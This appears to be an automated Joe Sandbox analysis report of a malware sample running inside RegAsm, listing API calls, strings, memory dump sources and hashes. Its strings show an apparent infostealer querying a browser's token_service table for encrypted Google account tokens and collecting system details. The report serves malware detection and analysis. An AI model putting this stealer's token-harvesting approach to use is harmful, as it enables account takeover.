                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00410C4B
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000), ref: 00410C58
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000,?), ref: 00410C5F
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00410C6F
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                        • String ID: %dx%d
                                                                                                                                                                                                                                        • API String ID: 3940144428-2206825331
                                                                                                                                                                                                                                        • Opcode ID: fa3c6274f822142a20cc3ebfe296ed34c019a70a2d3d3122d6912a561d387fb8
                                                                                                                                                                                                                                        • Instruction ID: 10970bef041411397078d824575da1c8168c4890c013ef65725a28c434970ae3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3c6274f822142a20cc3ebfe296ed34c019a70a2d3d3122d6912a561d387fb8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D101D6357413107BE32027A5AC0EF5B7A9EEB0AB52F500015FB04D71D0CAB0180087E9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                        • API String ID: 0-2528248365
                                                                                                                                                                                                                                        • Opcode ID: 1de916a61573115f6e1ac7d41e1dd424a8ef102e4c68aa72f0a98be6b78fa946
                                                                                                                                                                                                                                        • Instruction ID: 387f6a8bed04f7fce56ef0f9d8d703d73bc294801e1abca8dc3fd23a6cfebc6a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1de916a61573115f6e1ac7d41e1dd424a8ef102e4c68aa72f0a98be6b78fa946
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EF15774A046929FD701DF2CC984AA6FBF0FF44314F6C4559E8888BE91EB31E855CBA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                        • API String ID: 0-2528248365
                                                                                                                                                                                                                                        • Opcode ID: 121d00b062d968cfba68f308d3e987ec66de0b069ad8a187d770ec35fd040c05
                                                                                                                                                                                                                                        • Instruction ID: ddea2434740d42f884a67a7b4a44446c6e4a3de05708a3c967dda4a5469b2717
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 121d00b062d968cfba68f308d3e987ec66de0b069ad8a187d770ec35fd040c05
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB514572304250ABC750EA19EC84AE7B7F0EB88225FAC8869F4CAC7791D735E545CB61
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: [%!g,%!g],$[%!g,%!g]]
                                                                                                                                                                                                                                        • API String ID: 0-3388633204
                                                                                                                                                                                                                                        • Opcode ID: 36fe78861709bba3e23ab475300b591dfa730a397d1da57550a3c89f317639b6
                                                                                                                                                                                                                                        • Instruction ID: b1daff90fe0cf635617cebf32019f73001529e529c96c0b9e979dd63cc8ab3c0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36fe78861709bba3e23ab475300b591dfa730a397d1da57550a3c89f317639b6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59516B30A007119BE701DF65ECC5B9777B0BF42340F28862DFC899B291E771A585C792
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 19C6F33F
                                                                                                                                                                                                                                        • malformed inverted index for FTS%d table %s.%s, xrefs: 19C6F3F3
                                                                                                                                                                                                                                        • unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 19C6F418
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
                                                                                                                                                                                                                                        • API String ID: 0-2809892521
                                                                                                                                                                                                                                        • Opcode ID: e853114ab11dcb230621a0c5cf89ed3f5680b1c7077e48930eb16a72b49b0d28
                                                                                                                                                                                                                                        • Instruction ID: 807c9e38dc690006753de6b53e3fafa02906d3f141780d7b60d161ff5d95410b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e853114ab11dcb230621a0c5cf89ed3f5680b1c7077e48930eb16a72b49b0d28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75410472D01262DBD712ABB5FC8CA5B37A8EF40395F084429FC89C2360DB21A554DBB2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 004070D0: memcmp.MSVCRT ref: 0040710B
                                                                                                                                                                                                                                          • Part of subcall function 004070D0: memset.MSVCRT ref: 00407139
                                                                                                                                                                                                                                          • Part of subcall function 004070D0: LocalAlloc.KERNEL32(00000040,?), ref: 00407170
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00409105
                                                                                                                                                                                                                                          • Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040912B
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00409214
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00409228
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                        • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                        • API String ID: 2910778473-1713091031
                                                                                                                                                                                                                                        • Opcode ID: 7d5ed18ac61e3623f7527cf3b0272fe0aac5e728e85b1a854615acc292eaa145
                                                                                                                                                                                                                                        • Instruction ID: c4cb561b851d9ad46cf7f56b89ea9e95a2426b849739b0bc6f678560fdc0b582
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d5ed18ac61e3623f7527cf3b0272fe0aac5e728e85b1a854615acc292eaa145
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09D18271805248EACB14E7E5D955BDDBBB8AF19308F1440AEF906B3282DF785B08C779
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6580e5237cb44123b0f9dc7569dc3de52b866290fda7dbe56c1979d4f77269bb
                                                                                                                                                                                                                                        • Instruction ID: d7b5179947fd034f29ca7a51521f2cfcdb544d65db4a5b554bd56d58f7f044a0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6580e5237cb44123b0f9dc7569dc3de52b866290fda7dbe56c1979d4f77269bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB519572608200AFDB41EB64FC45F9A7BE2EFC5310F1984A4F188872B2E631DD519B52
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                                                                                                                                                                                                        • Instruction ID: 0d9e7bf604f4da3b83d662064e19cb95599ae65349cdc0698d7185cb7d724617
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DB1B0B2A04202ABC704CF28DC81A5AB7E5FF88254F4C552DF989D7B51E735F9248BA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
                                                                                                                                                                                                                                        • API String ID: 0-2679805236
                                                                                                                                                                                                                                        • Opcode ID: dec81a8c913f822b74d608ec1005c79327380aa75dbf3d8abc2aecfc7c71a2e8
                                                                                                                                                                                                                                        • Instruction ID: 3770d240644da21272d2303cf64e65d8494905be6caa56567c3b177a4acbd634
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dec81a8c913f822b74d608ec1005c79327380aa75dbf3d8abc2aecfc7c71a2e8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4714A72A043868FD701DF28EC88A5AB7E4FF94354F0C4529EC8AD7291EB35E505CB96
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                                        • API String ID: 0-3864549341
                                                                                                                                                                                                                                        • Opcode ID: 125182a9f4ed8f845f3041c7702c7fa9815bec178ce6b5ebdd337bd8a728e584
                                                                                                                                                                                                                                        • Instruction ID: 86d6a4248e50fad18a1a703e14e4eb839c495f2965a67ab4a6d13c23bf6f0649
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 125182a9f4ed8f845f3041c7702c7fa9815bec178ce6b5ebdd337bd8a728e584
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F86169B5640B416BFB118B28CC49F9777B4AF41304F1C4168E45B9FEC2E7A5E150C7A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
